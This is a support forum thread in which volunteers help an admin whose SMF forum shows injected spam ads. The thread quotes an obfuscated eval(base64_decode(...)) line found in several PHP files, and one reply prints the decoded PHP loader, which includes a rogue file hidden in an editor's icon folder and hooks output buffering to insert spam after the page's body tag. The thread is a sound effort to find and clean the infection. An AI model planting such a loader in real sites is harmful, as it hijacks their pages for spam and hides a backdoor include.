Want to get involved in developing SMF, then why not lend a hand on our github!

Main Menu

Another Spam Question

Started by rake60, November 18, 2008, 06:21:48 PM

Previous topic - Next topic


Something got to us.
It adds index.php to the index page address and a full page of
spam ads appear above our page.  Scroll down far enough and our stuff is there.
It only happens when we are logged in.  It also has wiped out the avatars.

How do fix that?
The url is [nonactive]
Any help would be greatly appreciated.


Hey, wow, I'm working another topic today that is EXACTLY THE SAME!!! When I say "exactly" I mean the exact same tons and tons of advertising right after your <body> tag in your HTML. Use View -> Source in your browser to see it.

Please attach your index.template.php file to your reply.

Also, look in your root directory and tell me if you have a file called display.php. Note that this is NOT SMF's file Display.php in Sources, nor is it Display.template.php in your Themes path. It is a file "display.php" with all lower case. I'll bet you dollars to donuts that you have the exact same infection.

By the way, your forum subject is way, way cool! :)


Thanks for the comment.

I am not seeing a display.php file, but to be very honest I'm not all that sure of what I'm doing here.
Our webmaster has fallen ill, and I am more or less blind in the dark.


I got sick yesterday afternoon and still sick today, too ill to work support. I've contacted the SMF Support Team and I've requested that they send a team member over to this topic to continue support. I'll return when I get better, probably tomorrow. Good luck!

p.s. I had a quick look and apparently I was wrong. As I said, I'm sending some help to take over this topic.


Has anyone looking at or working on this issue?


The issue is in your BoardIndex.template.php file. And what's interesting is the difference between this:
and this:

Perhaps, attach your BoardIndex.template.php file?
Always be a little kinder than necessary.
- James M. Barrie


Thank you!  I'll look into that.


I posted this in another topic as well. Check the index.php file in the root of your smf folder. There may be an include(filenamehere.php/html) in that file that is calling the add.
IchBin™        TinyPortal


IchBin, thank you!  Once this is rectified, I will outline the issues found.


Deprecated, I am one of the admins at the HMEM site working with rake60 on the issue.  We have found a string of code on the index.php file that is suspect (public folder), and have also seen the same on the boardindex and display files in the themes folder.  It is at the top of code.  Sample of what we are seeing: <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zd.......

There are many other php files with the same code string on them.  Not sure if this is the hack or not, but it sure looks suspicious.

Your help is appreciated!


Yes it's a hack and the eval and base64 converts it to code to execute a function
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/jhomemod/public_html/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php')){include_once('/home/jhomemod/public_html/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}It looks like an exploit from another third party script you're running on the same host as it's point to a WYSIWYG editor folder
is jhomemod you account name?

Looks like your server has been comprimised, look for rogue files like the one it links too.  As well in any Attachment/Avatar folders of your forum.
"An important reward for a job well done is a personal sense of worthwhile achievement."

[ Themes ]